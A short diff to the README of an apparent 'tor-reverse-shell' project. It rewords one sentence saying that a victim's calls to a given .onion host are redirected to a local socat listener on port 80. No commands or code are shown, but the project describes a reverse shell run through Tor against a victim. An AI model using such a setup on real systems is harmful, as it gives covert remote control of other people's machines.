tpaphysics/tor-reverse-shell/README.md

 lsgbhtjko6zcrgsyb2nzdx76rpyaycvivl5tnmwyq336hlbqxjremcid.onion
 ```

-Then every call the victim makes to host `lsgbhtjko6zcrgsyb2nzdx76rpyaycvivl5tnmwyq336hlbqxjremcid.onion` will be redirected to the **_socat_** server which is listening locally on port 80.
+Every call the victim makes to host `lsgbhtjko6zcrgsyb2nzdx76rpyaycvivl5tnmwyq336hlbqxjremcid.onion` will be redirected to the **_socat_** server which is listening locally on port 80.

 ## **💥 Considerations**